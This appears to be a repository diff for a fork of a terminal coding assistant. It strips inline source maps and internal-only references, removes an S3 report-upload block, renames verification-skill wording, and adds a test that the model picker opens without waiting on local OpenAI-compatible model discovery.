YXJ0aW5nTWVzc2FnZT17XG4gICAgICAgICdTdGFydGluZyBuZXcgbG9naW4gZm9sbG93aW5nIC9leHRyYS11c2FnZS4gRXhpdCB3aXRoIEN0cmwtQyB0byB1c2UgZXhpc3RpbmcgYWNjb3VudC4nXG4gICAgICB9XG4gICAgICBvbkRvbmU9e3N1Y2Nlc3MgPT4ge1xuICAgICAgICBjb250ZXh0Lm9uQ2hhbmdlQVBJS2V5KClcbiAgICAgICAgb25Eb25lKHN1Y2Nlc3MgPyAnTG9naW4gc3VjY2Vzc2Z1bCcgOiAnTG9naW4gaW50ZXJydXB0ZWQnKVxuICAgICAgfX1cbiAgICAvPlxuICApXG59XG4iXSwibWFwcGluZ3MiOiJBQUFBLE9BQU9BLEtBQUssTUFBTSxPQUFPO0FBQ3pCLGNBQWNDLHNCQUFzQixRQUFRLG1CQUFtQjtBQUMvRCxjQUFjQyxxQkFBcUIsUUFBUSx3QkFBd0I7QUFDbkUsU0FBU0MsS0FBSyxRQUFRLG1CQUFtQjtBQUN6QyxTQUFTQyxhQUFhLFFBQVEsdUJBQXVCO0FBRXJELE9BQU8sZUFBZUMsSUFBSUEsQ0FDeEJDLE1BQU0sRUFBRUoscUJBQXFCLEVBQzdCSyxPQUFPLEVBQUVOLHNCQUFzQixDQUNoQyxFQUFFTyxPQUFPLENBQUNSLEtBQUssQ0FBQ1MsU0FBUyxHQUFHLElBQUksQ0FBQyxDQUFDO0VBQ2pDLE1BQU1DLE1BQU0sR0FBRyxNQUFNTixhQUFhLENBQUMsQ0FBQztFQUVwQyxJQUFJTSxNQUFNLENBQUNDLElBQUksS0FBSyxTQUFTLEVBQUU7SUFDN0JMLE1BQU0sQ0FBQ0ksTUFBTSxDQUFDRSxLQUFLLENBQUM7SUFDcEIsT0FBTyxJQUFJO0VBQ2I7RUFFQSxPQUNFLENBQUMsS0FBSyxDQUNKLGVBQWUsQ0FBQyxDQUNkLHNGQUNGLENBQUMsQ0FDRCxNQUFNLENBQUMsQ0FBQ0MsT0FBTyxJQUFJO0lBQ2pCTixPQUFPLENBQUNPLGNBQWMsQ0FBQyxDQUFDO0lBQ3hCUixNQUFNLENBQUNPLE9BQU8sR0FBRyxrQkFBa0IsR0FBRyxtQkFBbUIsQ0FBQztFQUM1RCxDQUFDLENBQUMsR0FDRjtBQUVOIiwiaWdub3JlTGlzdCI6W119

File diff suppressed because one or more lines are too long

View File

@@ -22,4 +22,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: LocalJSXComma
const initialDescription = args || ''; const initialDescription = args || '';
return renderFeedbackComponent(onDone, context.abortController.signal, context.messages, initialDescription); return renderFeedbackComponent(onDone, context.abortController.signal, context.messages, initialDescription);
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkNvbW1hbmRSZXN1bHREaXNwbGF5IiwiTG9jYWxKU1hDb21tYW5kQ29udGV4dCIsIkZlZWRiYWNrIiwiTG9jYWxKU1hDb21tYW5kT25Eb25lIiwiTWVzc2FnZSIsInJlbmRlckZlZWRiYWNrQ29tcG9uZW50Iiwib25Eb25lIiwicmVzdWx0Iiwib3B0aW9ucyIsImRpc3BsYXkiLCJhYm9ydFNpZ25hbCIsIkFib3J0U2lnbmFsIiwibWVzc2FnZXMiLCJpbml0aWFsRGVzY3JpcHRpb24iLCJiYWNrZ3JvdW5kVGFza3MiLCJ0YXNrSWQiLCJ0eXBlIiwiaWRlbnRpdHkiLCJhZ2VudElkIiwiUmVhY3ROb2RlIiwiY2FsbCIsImNvbnRleHQiLCJhcmdzIiwiUHJvbWlzZSIsImFib3J0Q29udHJvbGxlciIsInNpZ25hbCJdLCJzb3VyY2VzIjpbImZlZWRiYWNrLnRzeCJdLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgKiBhcyBSZWFjdCBmcm9tICdyZWFjdCdcbmltcG9ydCB0eXBlIHtcbiAgQ29tbWFuZFJlc3VsdERpc3BsYXksXG4gIExvY2FsSlNYQ29tbWFuZENvbnRleHQsXG59IGZyb20gJy4uLy4uL2NvbW1hbmRzLmpzJ1xuaW1wb3J0IHsgRmVlZGJhY2sgfSBmcm9tICcuLi8uLi9jb21wb25lbnRzL0ZlZWRiYWNrLmpzJ1xuaW1wb3J0IHR5cGUgeyBMb2NhbEpTWENvbW1hbmRPbkRvbmUgfSBmcm9tICcuLi8uLi90eXBlcy9jb21tYW5kLmpzJ1xuaW1wb3J0IHR5cGUgeyBNZXNzYWdlIH0gZnJvbSAnLi4vLi4vdHlwZXMvbWVzc2FnZS5qcydcblxuLy8gU2hhcmVkIGZ1bmN0aW9uIHRvIHJlbmRlciB0aGUgRmVlZGJhY2sgY29tcG9uZW50XG5leHBvcnQgZnVuY3Rpb24gcmVuZGVyRmVlZGJhY2tDb21wb25lbnQoXG4gIG9uRG9uZTogKFxuICAgIHJlc3VsdD86IHN0cmluZyxcbiAgICBvcHRpb25zPzogeyBkaXNwbGF5PzogQ29tbWFuZFJlc3VsdERpc3BsYXkgfSxcbiAgKSA9PiB2b2lkLFxuICBhYm9ydFNpZ25hbDogQWJvcnRTaWduYWwsXG4gIG1lc3NhZ2VzOiBNZXNzYWdlW10sXG4gIGluaXRpYWxEZXNjcmlwdGlvbjogc3RyaW5nID0gJycsXG4gIGJhY2tncm91bmRUYXNrczoge1xuICAgIFt0YXNrSWQ6IHN0cmluZ106IHtcbiAgICAgIHR5cGU6IHN0cmluZ1xuICAgICAgaWRlbnRpdHk/OiB7IGFnZW50SWQ6IHN0cmluZyB9XG4gICAgICBtZXNzYWdlcz86IE1lc3NhZ2VbXVxuICAgIH1cbiAgfSA9IHt9LFxuKTogUmVhY3QuUmVhY3ROb2RlIHtcbiAgcmV0dXJuIChcbiAgICA8RmVlZGJhY2tcbiAgICAgIGFib3J0U2lnbmFsPXthYm9ydFNpZ25hbH1cbiAgICAgIG1lc3NhZ2VzPXttZXNzYWdlc31cbiAgICAgIGluaXRpYWxEZXNjcmlwdGlvbj17aW5pdGlhbERlc2NyaXB0aW9ufVxuICAgICAgb25Eb25lPXtvbkRvbmV9XG4gICAgICBiYWNrZ3JvdW5kVGFza3M9e2JhY2tncm91bmRUYXNrc31cbiAgICAvPlxuICApXG59XG5cbmV4cG9ydCBhc3luYyBmdW5jdGlvbiBjYWxsKFxuICBvbkRvbmU6IExvY2FsSlNYQ29tbWFuZE9uRG9uZSxcbiAgY29udGV4dDogTG9jYWxKU1hDb21tYW5kQ29udGV4dCxcbiAgYXJncz86IHN0cmluZyxcbik6IFByb21pc2U8UmVhY3QuUmVhY3ROb2RlPiB7XG4gIGNvbnN0IGluaXRpYWxEZXNjcmlwdGlvbiA9IGFyZ3MgfHwgJydcbiAgcmV0dXJuIHJlbmRlckZlZWRiYWNrQ29tcG9uZW50KFxuICAgIG9uRG9uZSxcbiAgICBjb250ZXh0LmFib3J0Q29udHJvbGxlci5zaWduYWwsXG4gICAgY29udGV4dC5tZXNzYWdlcyxcbiAgICBpbml0aWFsRGVzY3JpcHRpb24sXG4gIClcbn1cbiJdLCJtYXBwaW5ncyI6IkFBQUEsT0FBTyxLQUFLQSxLQUFLLE1BQU0sT0FBTztBQUM5QixjQUNFQyxvQkFBb0IsRUFDcEJDLHNCQUFzQixRQUNqQixtQkFBbUI7QUFDMUIsU0FBU0MsUUFBUSxRQUFRLDhCQUE4QjtBQUN2RCxjQUFjQyxxQkFBcUIsUUFBUSx3QkFBd0I7QUFDbkUsY0FBY0MsT0FBTyxRQUFRLHdCQUF3Qjs7QUFFckQ7QUFDQSxPQUFPLFNBQVNDLHVCQUF1QkEsQ0FDckNDLE1BQU0sRUFBRSxDQUNOQyxNQUFlLENBQVIsRUFBRSxNQUFNLEVBQ2ZDLE9BQTRDLENBQXBDLEVBQUU7RUFBRUMsT0FBTyxDQUFDLEVBQUVULG9CQUFvQjtBQUFDLENBQUMsRUFDNUMsR0FBRyxJQUFJLEVBQ1RVLFdBQVcsRUFBRUMsV0FBVyxFQUN4QkMsUUFBUSxFQUFFUixPQUFPLEVBQUUsRUFDbkJTLGtCQUFrQixFQUFFLE1BQU0sR0FBRyxFQUFFLEVBQy9CQyxlQUFlLEVBQUU7RUFDZixDQUFDQyxNQUFNLEVBQUUsTUFBTSxDQUFDLEVBQUU7SUFDaEJDLElBQUksRUFBRSxNQUFNO0lBQ1pDLFFBQVEsQ0FBQyxFQUFFO01BQUVDLE9BQU8sRUFBRSxNQUFNO0lBQUMsQ0FBQztJQUM5Qk4sUUFBUSxDQUFDLEVBQUVSLE9BQU8sRUFBRTtFQUN0QixDQUFDO0FBQ0gsQ0FBQyxHQUFHLENBQUMsQ0FBQyxDQUNQLEVBQUVMLEtBQUssQ0FBQ29CLFNBQVMsQ0FBQztFQUNqQixPQUNFLENBQUMsUUFBUSxDQUNQLFdBQVcsQ0FBQyxDQUFDVCxXQUFXLENBQUMsQ0FDekIsUUFBUSxDQUFDLENBQUNFLFFBQVEsQ0FBQyxDQUNuQixrQkFBa0IsQ0FBQyxDQUFDQyxrQkFBa0IsQ0FBQyxDQUN2QyxNQUFNLENBQUMsQ0FBQ1AsTUFBTSxDQUFDLENBQ2YsZUFBZSxDQUFDLENBQUNRLGVBQWUsQ0FBQyxHQUNqQztBQUVOO0FBRUEsT0FBTyxlQUFlTSxJQUFJQSxDQUN4QmQsTUFBTSxFQUFFSCxxQkFBcUIsRUFDN0JrQixPQUFPLEVBQUVwQixzQkFBc0IsRUFDL0JxQixJQUFhLENBQVIsRUFBRSxNQUFNLENBQ2QsRUFBRUMsT0FBTyxDQUFDeEIsS0FBSyxDQUFDb0IsU0FBUyxDQUFDLENBQUM7RUFDMUIsTUFBTU4sa0JBQWtCLEdBQUdTLElBQUksSUFBSSxFQUFFO0VBQ3JDLE9BQU9qQix1QkFBdUIsQ0FDNUJDLE1BQU0sRUFDTmUsT0FBTyxDQUFDRyxlQUFlLENBQUNDLE1BQU0sRUFDOUJKLE9BQU8sQ0FBQ1QsUUFBUSxFQUNoQkMsa0JBQ0YsQ0FBQztBQUNIIiwiaWdub3JlTGlzdCI6W119

View File

@@ -8,4 +8,3 @@ export const call: LocalJSXCommandCall = async (onDone, {
}) => { }) => {
return <HelpV2 commands={commands} onClose={onDone} />; return <HelpV2 commands={commands} onClose={onDone} />;
}; };
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkhlbHBWMiIsIkxvY2FsSlNYQ29tbWFuZENhbGwiLCJjYWxsIiwib25Eb25lIiwib3B0aW9ucyIsImNvbW1hbmRzIl0sInNvdXJjZXMiOlsiaGVscC50c3giXSwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0ICogYXMgUmVhY3QgZnJvbSAncmVhY3QnXG5pbXBvcnQgeyBIZWxwVjIgfSBmcm9tICcuLi8uLi9jb21wb25lbnRzL0hlbHBWMi9IZWxwVjIuanMnXG5pbXBvcnQgdHlwZSB7IExvY2FsSlNYQ29tbWFuZENhbGwgfSBmcm9tICcuLi8uLi90eXBlcy9jb21tYW5kLmpzJ1xuXG5leHBvcnQgY29uc3QgY2FsbDogTG9jYWxKU1hDb21tYW5kQ2FsbCA9IGFzeW5jIChcbiAgb25Eb25lLFxuICB7IG9wdGlvbnM6IHsgY29tbWFuZHMgfSB9LFxuKSA9PiB7XG4gIHJldHVybiA8SGVscFYyIGNvbW1hbmRzPXtjb21tYW5kc30gb25DbG9zZT17b25Eb25lfSAvPlxufVxuIl0sIm1hcHBpbmdzIjoiQUFBQSxPQUFPLEtBQUtBLEtBQUssTUFBTSxPQUFPO0FBQzlCLFNBQVNDLE1BQU0sUUFBUSxtQ0FBbUM7QUFDMUQsY0FBY0MsbUJBQW1CLFFBQVEsd0JBQXdCO0FBRWpFLE9BQU8sTUFBTUMsSUFBSSxFQUFFRCxtQkFBbUIsR0FBRyxNQUFBQyxDQUN2Q0MsTUFBTSxFQUNOO0VBQUVDLE9BQU8sRUFBRTtJQUFFQztFQUFTO0FBQUUsQ0FBQyxLQUN0QjtFQUNILE9BQU8sQ0FBQyxNQUFNLENBQUMsUUFBUSxDQUFDLENBQUNBLFFBQVEsQ0FBQyxDQUFDLE9BQU8sQ0FBQyxDQUFDRixNQUFNLENBQUMsR0FBRztBQUN4RCxDQUFDIiwiaWdub3JlTGlzdCI6W119

View File

@@ -10,4 +10,3 @@ export const call: LocalJSXCommandCall = async (onDone, context) => {
const toolNames = getTools(permissionContext).map(tool => tool.name); const toolNames = getTools(permissionContext).map(tool => tool.name);
return <HooksConfigMenu toolNames={toolNames} onExit={onDone} />; return <HooksConfigMenu toolNames={toolNames} onExit={onDone} />;
}; };
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIkhvb2tzQ29uZmlnTWVudSIsImxvZ0V2ZW50IiwiZ2V0VG9vbHMiLCJMb2NhbEpTWENvbW1hbmRDYWxsIiwiY2FsbCIsIm9uRG9uZSIsImNvbnRleHQiLCJhcHBTdGF0ZSIsImdldEFwcFN0YXRlIiwicGVybWlzc2lvbkNvbnRleHQiLCJ0b29sUGVybWlzc2lvbkNvbnRleHQiLCJ0b29sTmFtZXMiLCJtYXAiLCJ0b29sIiwibmFtZSJdLCJzb3VyY2VzIjpbImhvb2tzLnRzeCJdLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgKiBhcyBSZWFjdCBmcm9tICdyZWFjdCdcbmltcG9ydCB7IEhvb2tzQ29uZmlnTWVudSB9IGZyb20gJy4uLy4uL2NvbXBvbmVudHMvaG9va3MvSG9va3NDb25maWdNZW51LmpzJ1xuaW1wb3J0IHsgbG9nRXZlbnQgfSBmcm9tICcuLi8uLi9zZXJ2aWNlcy9hbmFseXRpY3MvaW5kZXguanMnXG5pbXBvcnQgeyBnZXRUb29scyB9IGZyb20gJy4uLy4uL3Rvb2xzLmpzJ1xuaW1wb3J0IHR5cGUgeyBMb2NhbEpTWENvbW1hbmRDYWxsIH0gZnJvbSAnLi4vLi4vdHlwZXMvY29tbWFuZC5qcydcblxuZXhwb3J0IGNvbnN0IGNhbGw6IExvY2FsSlNYQ29tbWFuZENhbGwgPSBhc3luYyAob25Eb25lLCBjb250ZXh0KSA9PiB7XG4gIGxvZ0V2ZW50KCd0ZW5ndV9ob29rc19jb21tYW5kJywge30pXG4gIGNvbnN0IGFwcFN0YXRlID0gY29udGV4dC5nZXRBcHBTdGF0ZSgpXG4gIGNvbnN0IHBlcm1pc3Npb25Db250ZXh0ID0gYXBwU3RhdGUudG9vbFBlcm1pc3Npb25Db250ZXh0XG4gIGNvbnN0IHRvb2xOYW1lcyA9IGdldFRvb2xzKHBlcm1pc3Npb25Db250ZXh0KS5tYXAodG9vbCA9PiB0b29sLm5hbWUpXG4gIHJldHVybiA8SG9va3NDb25maWdNZW51IHRvb2xOYW1lcz17dG9vbE5hbWVzfSBvbkV4aXQ9e29uRG9uZX0gLz5cbn1cbiJdLCJtYXBwaW5ncyI6IkFBQUEsT0FBTyxLQUFLQSxLQUFLLE1BQU0sT0FBTztBQUM5QixTQUFTQyxlQUFlLFFBQVEsMkNBQTJDO0FBQzNFLFNBQVNDLFFBQVEsUUFBUSxtQ0FBbUM7QUFDNUQsU0FBU0MsUUFBUSxRQUFRLGdCQUFnQjtBQUN6QyxjQUFjQyxtQkFBbUIsUUFBUSx3QkFBd0I7QUFFakUsT0FBTyxNQUFNQyxJQUFJLEVBQUVELG1CQUFtQixHQUFHLE1BQUFDLENBQU9DLE1BQU0sRUFBRUMsT0FBTyxLQUFLO0VBQ2xFTCxRQUFRLENBQUMscUJBQXFCLEVBQUUsQ0FBQyxDQUFDLENBQUM7RUFDbkMsTUFBTU0sUUFBUSxHQUFHRCxPQUFPLENBQUNFLFdBQVcsQ0FBQyxDQUFDO0VBQ3RDLE1BQU1DLGlCQUFpQixHQUFHRixRQUFRLENBQUNHLHFCQUFxQjtFQUN4RCxNQUFNQyxTQUFTLEdBQUdULFFBQVEsQ0FBQ08saUJBQWlCLENBQUMsQ0FBQ0csR0FBRyxDQUFDQyxJQUFJLElBQUlBLElBQUksQ0FBQ0MsSUFBSSxDQUFDO0VBQ3BFLE9BQU8sQ0FBQyxlQUFlLENBQUMsU0FBUyxDQUFDLENBQUNILFNBQVMsQ0FBQyxDQUFDLE1BQU0sQ0FBQyxDQUFDTixNQUFNLENBQUMsR0FBRztBQUNsRSxDQUFDIiwiaWdub3JlTGlzdCI6W119

File diff suppressed because one or more lines are too long

View File

@@ -70,7 +70,7 @@ If the user chose personal CLAUDE.local.md or both: ask about them, not the code
- Only if Phase 2 found multiple git worktrees: ask whether their worktrees are nested inside the main repo (e.g., \`.claude/worktrees/<name>/\`) or siblings/external (e.g., \`../myrepo-feature/\`). If nested, the upward file walk finds the main repo's CLAUDE.local.md automatically — no special handling needed. If sibling/external, the personal content should live in a home-directory file (e.g., \`~/.claude/<project-name>-instructions.md\`) and each worktree gets a one-line CLAUDE.local.md stub that imports it: \`@~/.claude/<project-name>-instructions.md\`. Never put this import in the project CLAUDE.md — that would check a personal reference into the team-shared file. - Only if Phase 2 found multiple git worktrees: ask whether their worktrees are nested inside the main repo (e.g., \`.claude/worktrees/<name>/\`) or siblings/external (e.g., \`../myrepo-feature/\`). If nested, the upward file walk finds the main repo's CLAUDE.local.md automatically — no special handling needed. If sibling/external, the personal content should live in a home-directory file (e.g., \`~/.claude/<project-name>-instructions.md\`) and each worktree gets a one-line CLAUDE.local.md stub that imports it: \`@~/.claude/<project-name>-instructions.md\`. Never put this import in the project CLAUDE.md — that would check a personal reference into the team-shared file.
- Any communication preferences? (e.g., "be terse", "always explain tradeoffs", "don't summarize at the end") - Any communication preferences? (e.g., "be terse", "always explain tradeoffs", "don't summarize at the end")
**Synthesize a proposal from Phase 2 findings** — e.g., format-on-edit if a formatter exists, a \`/verify\` skill if tests exist, a CLAUDE.md note for anything from the gap-fill answers that's a guideline rather than a workflow. For each, pick the artifact type that fits, **constrained by the Phase 1 skills+hooks choice**: **Synthesize a proposal from Phase 2 findings** — e.g., format-on-edit if a formatter exists, a project verification workflow if tests exist, a CLAUDE.md note for anything from the gap-fill answers that's a guideline rather than a workflow. For each, pick the artifact type that fits, **constrained by the Phase 1 skills+hooks choice**:
- **Hook** (stricter) — deterministic shell command on a tool event; Claude can't skip it. Fits mechanical, fast, per-edit steps: formatting, linting, running a quick test on the changed file. - **Hook** (stricter) — deterministic shell command on a tool event; Claude can't skip it. Fits mechanical, fast, per-edit steps: formatting, linting, running a quick test on the changed file.
- **Skill** (on-demand) — you or Claude invoke \`/skill-name\` when you want it. Fits workflows that don't belong on every edit: deep verification, session reports, deploys. - **Skill** (on-demand) — you or Claude invoke \`/skill-name\` when you want it. Fits workflows that don't belong on every edit: deep verification, session reports, deploys.
@@ -85,7 +85,7 @@ If the user chose personal CLAUDE.local.md or both: ask about them, not the code
- **Keep previews compact — the preview box truncates with no scrolling.** One line per item, no blank lines between items, no header. Example preview content: - **Keep previews compact — the preview box truncates with no scrolling.** One line per item, no blank lines between items, no header. Example preview content:
• **Format-on-edit hook** (automatic) — \`ruff format <file>\` via PostToolUse • **Format-on-edit hook** (automatic) — \`ruff format <file>\` via PostToolUse
• **/verify skill** (on-demand) — \`make lint && make typecheck && make test\` • **Verification workflow** (on-demand) — \`make lint && make typecheck && make test\`
• **CLAUDE.md note** (guideline) — "run lint/typecheck/test before marking done" • **CLAUDE.md note** (guideline) — "run lint/typecheck/test before marking done"
- Option labels stay short ("Looks good", "Drop the hook", "Drop the skill") — the tool auto-adds an "Other" free-text option, so don't add your own catch-all. - Option labels stay short ("Looks good", "Drop the hook", "Drop the skill") — the tool auto-adds an "Other" free-text option, so don't add your own catch-all.
@@ -157,7 +157,7 @@ Skills add capabilities Claude can use on demand without bloating every session.
**First, consume \`skill\` entries from the Phase 3 preference queue.** Each queued skill preference becomes a SKILL.md tailored to what the user described. For each: **First, consume \`skill\` entries from the Phase 3 preference queue.** Each queued skill preference becomes a SKILL.md tailored to what the user described. For each:
- Name it from the preference (e.g., "verify-deep", "session-report", "deploy-sandbox") - Name it from the preference (e.g., "verify-deep", "session-report", "deploy-sandbox")
- Write the body using the user's own words from the interview plus whatever Phase 2 found (test commands, report format, deploy target). If the preference maps to an existing bundled skill (e.g., \`/verify\`), write a project skill that adds the user's specific constraints on top — tell the user the bundled one still exists and theirs is additive. - Write the body using the user's own words from the interview plus whatever Phase 2 found (test commands, report format, deploy target). If the preference maps to an existing project workflow, write a project skill that captures the user's specific constraints on top.
- Ask a quick follow-up if the preference is underspecified (e.g., "which test command should verify-deep run?") - Ask a quick follow-up if the preference is underspecified (e.g., "which test command should verify-deep run?")
**Then suggest additional skills** beyond the queue when you find: **Then suggest additional skills** beyond the queue when you find:

View File

@@ -2187,7 +2187,7 @@ function generateHtmlReport(
` `
: '' : ''
// Build Team Feedback section (collapsible, ant-only) // Build Team Feedback section (collapsible, internal-only)
const ccImprovements = const ccImprovements =
process.env.USER_TYPE === 'ant' process.env.USER_TYPE === 'ant'
? insights.cc_team_improvements?.improvements || [] ? insights.cc_team_improvements?.improvements || []
@@ -2804,7 +2804,7 @@ export async function generateUsageReport(options?: {
}> { }> {
let remoteStats: { hosts: RemoteHostInfo[]; totalCopied: number } | undefined let remoteStats: { hosts: RemoteHostInfo[]; totalCopied: number } | undefined
// Optionally collect data from remote hosts first (ant-only) // Optionally collect data from remote hosts first (internal-only)
if (process.env.USER_TYPE === 'ant' && options?.collectRemote) { if (process.env.USER_TYPE === 'ant' && options?.collectRemote) {
const destDir = join(getClaudeConfigHomeDir(), 'projects') const destDir = join(getClaudeConfigHomeDir(), 'projects')
const { hosts, totalCopied } = await collectAllRemoteHostData(destDir) const { hosts, totalCopied } = await collectAllRemoteHostData(destDir)
@@ -3072,33 +3072,6 @@ const usageReport: Command = {
let reportUrl = `file://${htmlPath}` let reportUrl = `file://${htmlPath}`
let uploadHint = '' let uploadHint = ''
if (process.env.USER_TYPE === 'ant') {
// Try to upload to S3
const timestamp = new Date()
.toISOString()
.replace(/[-:]/g, '')
.replace('T', '_')
.slice(0, 15)
const username = process.env.SAFEUSER || process.env.USER || 'unknown'
const filename = `${username}_insights_${timestamp}.html`
const s3Path = `s3://anthropic-serve/atamkin/cc-user-reports/${filename}`
const s3Url = `https://s3-frontend.infra.ant.dev/anthropic-serve/atamkin/cc-user-reports/${filename}`
reportUrl = s3Url
try {
execFileSync('ff', ['cp', htmlPath, s3Path], {
timeout: 60000,
stdio: 'pipe', // Suppress output
})
} catch {
// Upload failed - fall back to local file and show upload command
reportUrl = `file://${htmlPath}`
uploadHint = `\nAutomatic upload failed. Are you on the boron namespace? Try \`use-bo\` and ensure you've run \`sso\`.
To share, run: ff cp ${htmlPath} ${s3Path}
Then access at: ${s3Url}`
}
}
// Build header with stats // Build header with stats
const sessionLabel = const sessionLabel =
data.total_sessions_scanned && data.total_sessions_scanned &&
@@ -3112,7 +3085,7 @@ Then access at: ${s3Url}`
`${data.git_commits} commits`, `${data.git_commits} commits`,
].join(' · ') ].join(' · ')
// Build remote host info (ant-only) // Build remote host info (internal-only)
let remoteInfo = '' let remoteInfo = ''
if (process.env.USER_TYPE === 'ant') { if (process.env.USER_TYPE === 'ant') {
if (remoteStats && remoteStats.totalCopied > 0) { if (remoteStats && remoteStats.totalCopied > 0) {

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@@ -12,4 +12,3 @@ export function CheckGitHubStep() {
} }
return t0; return t0;
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJSZWFjdCIsIlRleHQiLCJDaGVja0dpdEh1YlN0ZXAiLCIkIiwiX2MiLCJ0MCIsIlN5bWJvbCIsImZvciJdLCJzb3VyY2VzIjpbIkNoZWNrR2l0SHViU3RlcC50c3giXSwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IFJlYWN0IGZyb20gJ3JlYWN0J1xuaW1wb3J0IHsgVGV4dCB9IGZyb20gJy4uLy4uL2luay5qcydcblxuZXhwb3J0IGZ1bmN0aW9uIENoZWNrR2l0SHViU3RlcCgpIHtcbiAgcmV0dXJuIDxUZXh0PkNoZWNraW5nIEdpdEh1YiBDTEkgaW5zdGFsbGF0aW9u4oCmPC9UZXh0PlxufVxuIl0sIm1hcHBpbmdzIjoiO0FBQUEsT0FBT0EsS0FBSyxNQUFNLE9BQU87QUFDekIsU0FBU0MsSUFBSSxRQUFRLGNBQWM7QUFFbkMsT0FBTyxTQUFBQyxnQkFBQTtFQUFBLE1BQUFDLENBQUEsR0FBQUMsRUFBQTtFQUFBLElBQUFDLEVBQUE7RUFBQSxJQUFBRixDQUFBLFFBQUFHLE1BQUEsQ0FBQUMsR0FBQTtJQUNFRixFQUFBLElBQUMsSUFBSSxDQUFDLGlDQUFpQyxFQUF0QyxJQUFJLENBQXlDO0lBQUFGLENBQUEsTUFBQUUsRUFBQTtFQUFBO0lBQUFBLEVBQUEsR0FBQUYsQ0FBQTtFQUFBO0VBQUEsT0FBOUNFLEVBQThDO0FBQUEiLCJpZ25vcmVMaXN0IjpbXX0=

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@@ -0,0 +1,42 @@
import { afterEach, expect, mock, test } from 'bun:test'
const originalEnv = {
CLAUDE_CODE_USE_OPENAI: process.env.CLAUDE_CODE_USE_OPENAI,
OPENAI_BASE_URL: process.env.OPENAI_BASE_URL,
OPENAI_MODEL: process.env.OPENAI_MODEL,
}
afterEach(() => {
mock.restore()
process.env.CLAUDE_CODE_USE_OPENAI = originalEnv.CLAUDE_CODE_USE_OPENAI
process.env.OPENAI_BASE_URL = originalEnv.OPENAI_BASE_URL
process.env.OPENAI_MODEL = originalEnv.OPENAI_MODEL
})
test('opens the model picker without awaiting local model discovery refresh', async () => {
process.env.CLAUDE_CODE_USE_OPENAI = '1'
process.env.OPENAI_BASE_URL = 'http://127.0.0.1:8080/v1'
process.env.OPENAI_MODEL = 'qwen2.5-coder-7b-instruct'
let resolveDiscovery: (() => void) | undefined
const discoverOpenAICompatibleModelOptions = mock(
() =>
new Promise<void>(resolve => {
resolveDiscovery = resolve
}),
)
mock.module('../../utils/model/openaiModelDiscovery.js', () => ({
discoverOpenAICompatibleModelOptions,
}))
const { call } = await import(`./model.js?ts=${Date.now()}-${Math.random()}`)
const result = await Promise.race([
call(() => {}, {} as never, ''),
new Promise(resolve => setTimeout(() => resolve('timeout'), 50)),
])
resolveDiscovery?.()
expect(result).not.toBe('timeout')
})

File diff suppressed because one or more lines are too long

View File

@@ -4,4 +4,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<undefined> {
display: 'system' display: 'system'
}); });
} }
//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJuYW1lcyI6WyJMb2NhbEpTWENvbW1hbmRPbkRvbmUiLCJjYWxsIiwib25Eb25lIiwiUHJvbWlzZSIsImRpc3BsYXkiXSwic291cmNlcyI6WyJvdXRwdXQtc3R5bGUudHN4Il0sInNvdXJjZXNDb250ZW50IjpbImltcG9ydCB0eXBlIHsgTG9jYWxKU1hDb21tYW5kT25Eb25lIH0gZnJvbSAnLi4vLi4vdHlwZXMvY29tbWFuZC5qcydcblxuZXhwb3J0IGFzeW5jIGZ1bmN0aW9uIGNhbGwob25Eb25lOiBMb2NhbEpTWENvbW1hbmRPbkRvbmUpOiBQcm9taXNlPHVuZGVmaW5lZD4ge1xuICBvbkRvbmUoXG4gICAgJy9vdXRwdXQtc3R5bGUgaGFzIGJlZW4gZGVwcmVjYXRlZC4gVXNlIC9jb25maWcgdG8gY2hhbmdlIHlvdXIgb3V0cHV0IHN0eWxlLCBvciBzZXQgaXQgaW4geW91ciBzZXR0aW5ncyBmaWxlLiBDaGFuZ2VzIHRha2UgZWZmZWN0IG9uIHRoZSBuZXh0IHNlc3Npb24uJyxcbiAgICB7IGRpc3BsYXk6ICdzeXN0ZW0nIH0sXG4gIClcbn1cbiJdLCJtYXBwaW5ncyI6IkFBQUEsY0FBY0EscUJBQXFCLFFBQVEsd0JBQXdCO0FBRW5FLE9BQU8sZUFBZUMsSUFBSUEsQ0FBQ0MsTUFBTSxFQUFFRixxQkFBcUIsQ0FBQyxFQUFFRyxPQUFPLENBQUMsU0FBUyxDQUFDLENBQUM7RUFDNUVELE1BQU0sQ0FDSix1SkFBdUosRUFDdko7SUFBRUUsT0FBTyxFQUFFO0VBQVMsQ0FDdEIsQ0FBQztBQUNIIiwiaWdub3JlTGlzdCI6W119

View File

@@ -21,4 +21,3 @@ export async function call(onDone: LocalJSXCommandOnDone): Promise<React.ReactNo
}); });
return <Passes onDone={onDone} />; return <Passes onDone={onDone} />;
} }
